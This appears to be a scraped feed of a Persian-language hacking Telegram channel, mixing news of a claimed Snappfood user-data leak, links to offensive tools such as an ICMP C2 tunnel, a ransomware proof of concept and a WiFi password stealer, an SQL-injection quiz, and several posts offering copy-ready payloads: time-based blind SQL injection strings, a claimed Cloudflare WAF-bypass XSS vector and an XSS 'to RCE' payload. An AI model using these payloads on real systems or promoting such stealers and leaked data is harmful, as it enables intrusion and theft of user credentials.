0Day.Today | Learn Exploit | Zero World | Dark web |
اسنپفود هک شد! به طور خلاصه موارد زیر در اختیار فروشنده قرار داره : - اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ... - اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره…
دیتای snappfood فروخته نشده دوستان هم پست و هم سمپلی که گذاشتن رو هم پاک کردن
#news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
#news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
👍13😁2💔1
PingRAT - PingRAT secretly passes C2 traffic through firewalls using ICMP payloads
Github
#red_team #firewall_bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#red_team #firewall_bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3
Phirautee - A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares
Github
#ransomware #pentest
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#ransomware #pentest
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2👍2
0Day.Today | Learn Exploit | Zero World | Dark web |
♨️ چالش SQLi تمام شد. ❗️❔چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند. 💬گزینه هارو همراه با ذکر علت بفرمایید. 🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه. توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال…
♨️ جواب چالش :
💠 موارد 1 تا 4 دارای آسیب پذیری SQLi هستند. چرا ؟
ببینید دوستان یک ورودی ساده مثل '; SELECT 1=1; -- رو در نظر بگیرید
حالا بیایید توی چهار مورد اول جای USERNAME جایگذاری کنیم :
⚠️ نتیجه بعد از اجرا شدن
توی تمامی این چهار مورد یک تک کوتیشن اضافه میمونه که باعث ایجاد اررور میشه و در نتیجه Query دارای آسیب پذیری SQLi هستش.
علت اینکه این 4 مورد دارای آسیب پذیری هست اینکه برنامه نویس ورودی رو خودش به صورت دستی داره میسازه و خبری از پارامتریزه نیست.
اما تو دو مورد 5 و 6 این موارد رو تست کنیم :
نتیجه بعد از اجرا شدن
در این قسمت برنامه نویس با استفاده از آرگومان دوم اومده ورودی رو پارامتریزه کرده یعنی ورودی ابتدا وارد تابع mogrify() میشه و سپس وارد تابع _scape_args() میشه که باعث میشه Query پارامتریزه بشه.
اگه میخواهید در مورد این دو تابع اطلاعات بیشتری پیدا کنید :
🌐 GitHub
✅ برندگان چالش بر حسب میزان صحت پاسخ :
1. @Alirezkarimii
2. @arab1334
3. @xkdlee
دوستان جهت دریافت جایزه به آیدی @IRDefacer پیام بدن.
💠 موارد 1 تا 4 دارای آسیب پذیری SQLi هستند. چرا ؟
ببینید دوستان یک ورودی ساده مثل '; SELECT 1=1; -- رو در نظر بگیرید
حالا بیایید توی چهار مورد اول جای USERNAME جایگذاری کنیم :
⚠️ نتیجه بعد از اجرا شدن
1. cursor.execute("SELECT id FROM users WHERE username = '" '; SELECT 1=1; -- "'");
2. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
3. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
4. cursor.execute(f"SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
توی تمامی این چهار مورد یک تک کوتیشن اضافه میمونه که باعث ایجاد اررور میشه و در نتیجه Query دارای آسیب پذیری SQLi هستش.
علت اینکه این 4 مورد دارای آسیب پذیری هست اینکه برنامه نویس ورودی رو خودش به صورت دستی داره میسازه و خبری از پارامتریزه نیست.
اما تو دو مورد 5 و 6 این موارد رو تست کنیم :
نتیجه بعد از اجرا شدن
5. cursor.execute("SELECT id FROM users WHERE username = True");
6. cursor.execute("SELECT id FROM users WHERE username = True");
در این قسمت برنامه نویس با استفاده از آرگومان دوم اومده ورودی رو پارامتریزه کرده یعنی ورودی ابتدا وارد تابع mogrify() میشه و سپس وارد تابع _scape_args() میشه که باعث میشه Query پارامتریزه بشه.
اگه میخواهید در مورد این دو تابع اطلاعات بیشتری پیدا کنید :
🌐 GitHub
✅ برندگان چالش بر حسب میزان صحت پاسخ :
1. @Alirezkarimii
2. @arab1334
3. @xkdlee
دوستان جهت دریافت جایزه به آیدی @IRDefacer پیام بدن.
GitHub
PyMySQL/pymysql/cursors.py at main · PyMySQL/PyMySQL
MySQL client library for Python. Contribute to PyMySQL/PyMySQL development by creating an account on GitHub.
🔥5👍4
CVE-2023-21987 and CVE-2023-21991 - VirtualBox internals and exploitation
Github
#CVE #virtualbox
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #virtualbox
——————
0Day.Today
@LearnExploit
@Tech_Army
Qrious Secure
Analysis of VirtualBox CVE-2023-21987 and CVE-2023-21991
Introduction Hi, I am Trung (xikhud). Last month, I joined Qrious Secure team as a new member, and my first target was to find and reproduce the security bugs that @bienpnn used at the Pwn2Own Vancouver 2023 to escape the VirtualBox VM.
Since VirtualBox is…
Since VirtualBox is…
👍5👎1
Shell(@LearnExploit).py
1.2 KB
⚡4❤1✍1🤬1
WiFi password stealer - Simple Windows and Linux keystroke injection tool that exfiltrates stored WiFi data (SSID and password)
Github
#tools #wifi #stealer
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#tools #wifi #stealer
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - AleksaMCode/WiFi-password-stealer: Simple Windows and Linux keystroke injection tool that exfiltrates stored WiFi data…
Simple Windows and Linux keystroke injection tool that exfiltrates stored WiFi data (SSID and password). - AleksaMCode/WiFi-password-stealer
❤4
Please open Telegram to view this post
VIEW IN TELEGRAM
❤24👍4🤬3👎1
Time sleep sql injection ⚡️
Payload:
#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
'XOR(if(now()=sysdate(),sleep(33),0))OR'
#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6
Cloudflare WAF Bypass ⚡️
#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<a"/onclick=(confirm)(origin)>Click Here!
#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4
reflected XSS to RCE
Payload:
#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
"><img src=x onerror=alert(whoami)>
#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
👎9😁5❤1👍1
Galah - an LLM-powered web honeypot using the OpenAI API
Github
#honeypot
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#honeypot
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - 0x4D31/galah: Galah: An LLM-powered web honeypot.
Galah: An LLM-powered web honeypot. Contribute to 0x4D31/galah development by creating an account on GitHub.
❤5
sql injection payload
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515
#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3
Attack Surface Management Platform
Discover hidden assets and vulnerabilities in your environment
Integrate with the leading commercial and open source vulnerability scanners to scan for the latest CVEs and vulnerabilities.
Hacking is a problem that's only getting worse. But, with Sn1per, you can find what you can’t see—hidden assets and vulnerabilities in your environment.
Sn1per is a next-generation information gathering tool that provides automated, deep, and continuous security for organizations of all sizes.
cd Sn1per
bash install.sh
BugCod3
#Cybersecurity #Pentesting #Sn1per
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤🔥3